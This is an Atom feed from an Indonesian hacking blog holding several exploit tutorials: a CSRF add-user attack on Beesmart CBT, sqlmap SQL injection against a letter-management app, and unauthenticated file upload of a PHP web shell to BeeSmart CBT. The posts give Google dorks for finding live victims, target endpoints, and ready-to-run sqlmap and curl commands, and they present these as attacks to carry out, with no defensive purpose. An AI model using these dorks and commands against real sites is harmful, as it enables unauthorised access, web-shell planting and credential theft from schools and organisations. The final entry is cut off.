<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2116688564507620479</id><updated>2026-04-08T16:40:53.456+07:00</updated><category term="Deface"/><category term="Tutorial"/><category term="Shell"/><category term="IT"/><category term="Tools"/><category term="Remote Code Execution"/><category term="Injection"/><category term="Anime"/><category term="CSRF"/><title type='text'>./EcchiExploit Blog</title><subtitle type='html'>Anime, Hacking, And IT</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default?redirect=false'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default?start-index=26&amp;max-results=25&amp;redirect=false'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>86</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-8899480197810985493</id><published>2025-10-09T14:34:00.001+07:00</published><updated>2025-10-10T06:55:06.517+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CSRF"/><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><category scheme="http://www.blogger.com/atom/ns#" term="Injection"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>Exploit Unauthenticated CSRF Add User at Beesmart CBT</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilzrxi1Ao6zHiak6V_733Z0wWRvFKjV5lxfGfPa78E0IDZ_Ir1gE68WaUwaQrDnVpQgZIPX1J3sOGJnhJ5u9Hqfy_MbRn7iXus0LXHcZXWFZ5aP0Zb1eHZTSDuvWvKcgWDkeR14ikBcw8Weq4rkqALQnx6UaFeIlKmzvKeY4Fuura12PLMDaRmg-DX-_ju/s2688/GqHpUJwbgAAZx1o.jpeg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1512&quot; data-original-width=&quot;2688&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilzrxi1Ao6zHiak6V_733Z0wWRvFKjV5lxfGfPa78E0IDZ_Ir1gE68WaUwaQrDnVpQgZIPX1J3sOGJnhJ5u9Hqfy_MbRn7iXus0LXHcZXWFZ5aP0Zb1eHZTSDuvWvKcgWDkeR14ikBcw8Weq4rkqALQnx6UaFeIlKmzvKeY4Fuura12PLMDaRmg-DX-_ju/s16000/GqHpUJwbgAAZx1o.jpeg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Halo Guyssss....&lt;br /&gt;Jadi kali ini saya akan membagikan kerentanan di Beesmart CBT, langsung aja ke PoC nya aja lah malas saya ngetik panjang, oh iya kerentanan ini bisa di eksekusi di CBT Beesmart versi Mod atau yang lainnya juga.&lt;/p&gt;&lt;p&gt;Proof Of Concept (POC) :&lt;br /&gt;Payload :&amp;nbsp;&lt;span face=&quot;Poppins, sans-serif&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border: 0px; font-size: 15px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;u style=&quot;font-weight: bold;&quot;&gt;https://target.com/panel/pages/database_user_simpan.php&lt;/u&gt;&lt;br /&gt;Dork :&amp;nbsp;&lt;u style=&quot;font-weight: bold;&quot;&gt;&quot;Beesmart&quot; inurl:login.php&lt;/u&gt;&lt;br /&gt;CSRF :&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span face=&quot;Poppins, sans-serif&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border: 0px; font-size: 15px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br /&gt;&lt;iframe src=&quot;https://pastebin.com/embed_iframe/F7h72fzM&quot; style=&quot;border: none; width: 100%;&quot;&gt;&lt;/iframe&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span face=&quot;Poppins, sans-serif&quot; style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border: 0px; font-size: 15px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: 0px 0px; background-repeat: initial; background-size: initial; border: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-size: 15px;&quot;&gt;Kalian Dorking seperti biasa&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: 15px;&quot;&gt;Lalu jika sudah dorking kalian masukan payloadnya kalo &lt;b&gt;vuln &lt;/b&gt;itu blank&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: 15px;&quot;&gt;Tinggal masukan ke CSRF targetnya lalu jalankan CSRF&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: 15px;&quot;&gt;Setelahnya kalian tinggal input user sama password di CSRF&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: 15px;&quot;&gt;Bila sudah di submit dan ternyata &lt;b&gt;blank &lt;/b&gt;artinya sukses&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-size: 15px;&quot;&gt;Kembali ke halaman login dan masukan user password yang tadi kalian submit&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;&lt;span style=&quot;font-size: 15px;&quot;&gt;Oke dah segitu aja ./EcchiExploit pamit.....&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/8899480197810985493/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2025/10/exploit-unauthenticated-csrf-add-user.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/8899480197810985493'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/8899480197810985493'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2025/10/exploit-unauthenticated-csrf-add-user.html' title='Exploit Unauthenticated CSRF Add User at Beesmart CBT'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilzrxi1Ao6zHiak6V_733Z0wWRvFKjV5lxfGfPa78E0IDZ_Ir1gE68WaUwaQrDnVpQgZIPX1J3sOGJnhJ5u9Hqfy_MbRn7iXus0LXHcZXWFZ5aP0Zb1eHZTSDuvWvKcgWDkeR14ikBcw8Weq4rkqALQnx6UaFeIlKmzvKeY4Fuura12PLMDaRmg-DX-_ju/s72-c/GqHpUJwbgAAZx1o.jpeg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-39451491686272912</id><published>2025-04-15T16:03:00.003+07:00</published><updated>2025-04-17T09:18:55.644+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Anime"/><category scheme="http://www.blogger.com/atom/ns#" term="Injection"/><category scheme="http://www.blogger.com/atom/ns#" term="Tools"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>Blind &amp; Time Sql Injection at AMS (Aplikasi Manajemen Surat)</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOoPbjJDVGiz9fHcgr1zpsLvV8yk3gMlUG-EukfcBFvDtvju4oe1jO6UAtw0esTDWssPnHH5XHIECYMXIne4rweqWyfprmeFi0MzIIWzmyqyGb0apbUPd-hWbu4bWZSptugudnUSln4Xs9ABHzIWjqo_6bUIid4XlbLbduInPAZ9bSUZjuLufwVG4m3-d6/s4673/105931357_p0.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;2160&quot; data-original-width=&quot;4673&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOoPbjJDVGiz9fHcgr1zpsLvV8yk3gMlUG-EukfcBFvDtvju4oe1jO6UAtw0esTDWssPnHH5XHIECYMXIne4rweqWyfprmeFi0MzIIWzmyqyGb0apbUPd-hWbu4bWZSptugudnUSln4Xs9ABHzIWjqo_6bUIid4XlbLbduInPAZ9bSUZjuLufwVG4m3-d6/s16000/105931357_p0.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;Halo kawan&quot;, Sudah lama nih saya tidak buat content blogger hehehe&lt;br /&gt;&lt;br /&gt;Baiklah langsung aja yah skip intro dan lainnya....&lt;/p&gt;&lt;p&gt;Kali ini saya akan membagikan bagaimana melakukan exploit Sql Injection di Aplikasi Manajemen Surat... Disini saya akan menggunakan Sqlmap agar lebih mudah melakukan exploit.&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;Pertama&quot; pasti harus ada dorknya kan, nah tenang aja sudah saya siapkan dorknya&lt;br /&gt;Dork :&amp;nbsp;&lt;a href=&quot;https://www.google.com/search?q=Aplikasi+Manajemen+Surat+Username.+lock.+Password.+LOGIN&quot; target=&quot;_blank&quot;&gt;&lt;i&gt;Aplikasi Manajemen Surat Username. lock. Password. LOGIN&lt;/i&gt;&lt;/a&gt;&lt;br /&gt;Payload : &lt;b&gt;h&lt;u&gt;ttps://target.com/kode.php&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;Command Sqlmap : &lt;b&gt;python sqlmap.py -u &quot;https://target.com/kode.php?query=[Param Injection]&quot; -v 3 --random-agent --level 2 --risk 2&amp;nbsp;&lt;/b&gt;&lt;b&gt;--tamper between,space2mysqldash --batch --header &quot;X-Requested-With: XMLHttpRequest&quot; -dbs --threads 10&lt;/b&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;Lalu jika bahan sudah disiapkan semua kita langsung masuk ke metode exploitasi&lt;br /&gt;PoC :&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;Masukan payload ke target terlebih dahulu dengan set header atau modify header dengan value seperti ini &quot;X-Requested-With: XMLHttpRequest&quot;&lt;/p&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj8QC6Th_FiuFzlJdOWdBq4vtW6zevaPybs6PfTv5eESdMHymH1fTjcAJ3ZJ_awK_AL62PXByfhJTMJkopvVW5FD43wM7AX4vGXPbRP7r8Wio3Aegg-w4qrtizt6DKkwMUXJeNxLxPjux33DalTyGgbwibyQXIsWM1G48OLPduW1Ti7d1d54o7Ymgjv0-_U&quot;&gt;&lt;img data-original-height=&quot;646&quot; data-original-width=&quot;1366&quot; height=&quot;151&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj8QC6Th_FiuFzlJdOWdBq4vtW6zevaPybs6PfTv5eESdMHymH1fTjcAJ3ZJ_awK_AL62PXByfhJTMJkopvVW5FD43wM7AX4vGXPbRP7r8Wio3Aegg-w4qrtizt6DKkwMUXJeNxLxPjux33DalTyGgbwibyQXIsWM1G48OLPduW1Ti7d1d54o7Ymgjv0-_U=w320-h151&quot; title=&quot;Disini saya menggunakan Hackbar buat set header atau modify header&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Nah jika vuln ada sebuah data yang ditampilkan bila sudah seperti ini kita masukan ke Sqlmap lalu jalankan command yang sudah saya siapkan (kalian tinggal ubah targetnya ke target yang menurut kalian vuln)&lt;br /&gt;Bila sukses hingga mendapatkan username dan password database untuk user login maka kalian tinggal masuk saja ke dashboard login webnya&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh2LvJHeyAd5SxMBei_LaenU84nkiYCm5s4n1X5ye66Hden6pl79tXT0dyI2ZTNAduFlDGCfGZRXcBueIfxcr4Ieu37MPRPLS9VZSmyM2dLsV3krqcAYpMhwRY12_phi7nr1rnhcTtL_LDD40Mgx7ttDH_XPpV32uun4dpmlYyBddVQwHXm4rlKnny104bu&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;182&quot; data-original-width=&quot;1071&quot; height=&quot;54&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh2LvJHeyAd5SxMBei_LaenU84nkiYCm5s4n1X5ye66Hden6pl79tXT0dyI2ZTNAduFlDGCfGZRXcBueIfxcr4Ieu37MPRPLS9VZSmyM2dLsV3krqcAYpMhwRY12_phi7nr1rnhcTtL_LDD40Mgx7ttDH_XPpV32uun4dpmlYyBddVQwHXm4rlKnny104bu&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjC1Ut0LYXVWIXK5hyJ8LZQwswolVPpKXd1g-0_Ug6MY5lcn0F58Q4TVif6PoH5rTJ7FaeJ9o6T1wRSrl1WxF1Joh3w-xSx-FpteeOmR-RJUOhyzvrUvyILzj5DnjslVUKtChNNfYj_BI9pM5Y-BIBOjVkGTSzDUO3ezQY_2UBD9G1m1hdGBtEu-PrqXrR7&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;647&quot; data-original-width=&quot;1365&quot; height=&quot;152&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjC1Ut0LYXVWIXK5hyJ8LZQwswolVPpKXd1g-0_Ug6MY5lcn0F58Q4TVif6PoH5rTJ7FaeJ9o6T1wRSrl1WxF1Joh3w-xSx-FpteeOmR-RJUOhyzvrUvyILzj5DnjslVUKtChNNfYj_BI9pM5Y-BIBOjVkGTSzDUO3ezQY_2UBD9G1m1hdGBtEu-PrqXrR7&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiQinj9rexl9t1iCQD06YNcwlGEPSxA5qQFPmHXGB2NzYHV5hPBC68ixXp6xqZSV51Nh5n8d2M20MuOIfXpC68AUMTfUBAG7LrlXWIJ0ZRQ5TbMG2BxYZaYIHAmo_3D4e8y93HyGfUGreH8GUYs3TqbYKm0FVS6mxuRSBsKrMgxty3uDdHHccRqQ0yh3-DE&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;647&quot; data-original-width=&quot;1366&quot; height=&quot;152&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiQinj9rexl9t1iCQD06YNcwlGEPSxA5qQFPmHXGB2NzYHV5hPBC68ixXp6xqZSV51Nh5n8d2M20MuOIfXpC68AUMTfUBAG7LrlXWIJ0ZRQ5TbMG2BxYZaYIHAmo_3D4e8y93HyGfUGreH8GUYs3TqbYKm0FVS6mxuRSBsKrMgxty3uDdHHccRqQ0yh3-DE&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Baik segitu saja semoga beruntung :)&lt;br /&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;#SqlInjection #AppInjection #Sqlmap&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/39451491686272912/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2025/04/blind-time-sql-injection-at-ams.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/39451491686272912'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/39451491686272912'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2025/04/blind-time-sql-injection-at-ams.html' title='Blind &amp; Time Sql Injection at AMS (Aplikasi Manajemen Surat)'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOoPbjJDVGiz9fHcgr1zpsLvV8yk3gMlUG-EukfcBFvDtvju4oe1jO6UAtw0esTDWssPnHH5XHIECYMXIne4rweqWyfprmeFi0MzIIWzmyqyGb0apbUPd-hWbu4bWZSptugudnUSln4Xs9ABHzIWjqo_6bUIid4XlbLbduInPAZ9bSUZjuLufwVG4m3-d6/s72-c/105931357_p0.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-4505527839975437457</id><published>2023-12-27T11:17:00.007+07:00</published><updated>2023-12-27T16:47:43.348+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><category scheme="http://www.blogger.com/atom/ns#" term="Remote Code Execution"/><category scheme="http://www.blogger.com/atom/ns#" term="Shell"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>BeeSmart CBT Unauthenticated Arbitrary File Upload With cURL</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgGzPwjLonsrZrDKOK43kh5beJkK9u7MX8gBVmou7EFtjBB4MyjabNqv-WdFwKcrhU6qp_F-0fXrmiZzMNXTMZczonD3NjLglHbJA8izSSHVow_KWLd49tnsHsrE2MGf8PR8NUOJVCKZlk8UZ3__J94utJzfVGjJUubD3lamhiy33ZJxoZ0wUnCFpv1h54t&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;735&quot; data-original-width=&quot;640&quot; height=&quot;240&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgGzPwjLonsrZrDKOK43kh5beJkK9u7MX8gBVmou7EFtjBB4MyjabNqv-WdFwKcrhU6qp_F-0fXrmiZzMNXTMZczonD3NjLglHbJA8izSSHVow_KWLd49tnsHsrE2MGf8PR8NUOJVCKZlk8UZ3__J94utJzfVGjJUubD3lamhiy33ZJxoZ0wUnCFpv1h54t&quot; width=&quot;209&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Halo kawan kembali lagi dengan saya kali ini saya akan membuat tutorial exploit AFU dimana kalian juga sudah tahu tentang CBT ini yah :D&lt;/p&gt;&lt;p&gt;Nah di exploit kali ini saya nemu kerentanan yang dimana kita bisa mengaupload file menggunakan cURL sebagai perantaranya tadinya saya juga mau mengenplentansikannya kedalam bahasa program PHP tapi saya tidak ada waktu jadi saya buat tutorialnya simple aja yah.&lt;/p&gt;&lt;p&gt;Baiklah langsung aja ke PoC nya...&lt;/p&gt;&lt;p&gt;Dork :&amp;nbsp;&lt;b&gt;&lt;u&gt;intext:Selamat Datang. Siswa Peserta Ujian + Login&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Payload1 : &lt;b&gt;&lt;u&gt;https://target.com/panel/pages/upload-banner.php&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;cURL Command :&amp;nbsp;&lt;b&gt;&lt;u&gt;curl -F &quot;uploadfile1=@/pathshell/shell.php&quot; https://target.com/[path]/panel/pages/upload-banner.php -v -H &quot;Cookie: beeuser&quot; -k&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Akses Shell : &lt;b&gt;&lt;u&gt;https://target.com/images/shell.php&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Payload2 : &lt;b&gt;&lt;u&gt;https://target.com/panel/pages/upload-admin.php&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;cURL Command : &lt;b&gt;&lt;u&gt;curl -F &quot;uploadfile2=@/pathshell/shell.php&quot; https://target.com/[path]/panel/pages/upload-admin.php -v -H &quot;Cookie: beeuser&quot; -k&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Akses Shell : &lt;b&gt;&lt;u&gt;https://target.com/[path]/images/shell.php atau https://target.com/[path]/panel/pages/photo/shell.php&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Jika Vuln akan redirect ke halaman login...&lt;/p&gt;&lt;p&gt;Screenshot :&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiLXZCmttHG0cVX5LIxPWzM7KyTjAF0dcNVg1X_si7RNInp1GS4q3xI11QXnsDnORGKHFWgKGv15aXvTvemO8nUJIi13U3kQaBN6xkxUMlgRKGqjr1_hLG7ul6XiR4kSuf-OIZSt3kGUCAgMiasFMj3YPd3IyToV6F98nzx4Oowajv6IJ4iTLW-Tdvxl9Qd&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;768&quot; data-original-width=&quot;1366&quot; height=&quot;180&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiLXZCmttHG0cVX5LIxPWzM7KyTjAF0dcNVg1X_si7RNInp1GS4q3xI11QXnsDnORGKHFWgKGv15aXvTvemO8nUJIi13U3kQaBN6xkxUMlgRKGqjr1_hLG7ul6XiR4kSuf-OIZSt3kGUCAgMiasFMj3YPd3IyToV6F98nzx4Oowajv6IJ4iTLW-Tdvxl9Qd=w320-h180&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;Bila ada teks &quot;success&quot;&amp;nbsp;dari respone yang dieksekusi artinya berhasil bila tidak ada atau ada teks &quot;error&quot; artinya tidak bisa&lt;p&gt;&lt;/p&gt;&lt;p&gt;Akses Shell :&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiDuKePE8bkISHlYZSPmv8RcclSOuQ69NvnaA-w3hk-scedVP-Th2fLGwWiQCBqWep4nNht2Zs8em3nDc8OlQBi0rGGAwdThv0asxscjHL0j5T3dBWvrwe2UXeKu3f7HQAkrVd4zZQwIZB06npb2puqRl8OqSS9NEfYIuJofhCIyaonaOx58J43bmrwsAAX&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img data-original-height=&quot;768&quot; data-original-width=&quot;1366&quot; height=&quot;181&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiDuKePE8bkISHlYZSPmv8RcclSOuQ69NvnaA-w3hk-scedVP-Th2fLGwWiQCBqWep4nNht2Zs8em3nDc8OlQBi0rGGAwdThv0asxscjHL0j5T3dBWvrwe2UXeKu3f7HQAkrVd4zZQwIZB06npb2puqRl8OqSS9NEfYIuJofhCIyaonaOx58J43bmrwsAAX=w320-h181&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;Baiklah segitu aja dan terima kasih...&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;#BeeSmartExploit #EcchiExploit&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/4505527839975437457/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2023/12/beesmart-cbt-unauthenticated-arbitrary.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/4505527839975437457'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/4505527839975437457'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2023/12/beesmart-cbt-unauthenticated-arbitrary.html' title='BeeSmart CBT Unauthenticated Arbitrary File Upload With cURL'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/a/AVvXsEgGzPwjLonsrZrDKOK43kh5beJkK9u7MX8gBVmou7EFtjBB4MyjabNqv-WdFwKcrhU6qp_F-0fXrmiZzMNXTMZczonD3NjLglHbJA8izSSHVow_KWLd49tnsHsrE2MGf8PR8NUOJVCKZlk8UZ3__J94utJzfVGjJUubD3lamhiy33ZJxoZ0wUnCFpv1h54t=s72-c" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-5624778315096983973</id><published>2023-09-28T22:36:00.000+07:00</published><updated>2023-09-28T22:36:40.712+07:00</updated><category 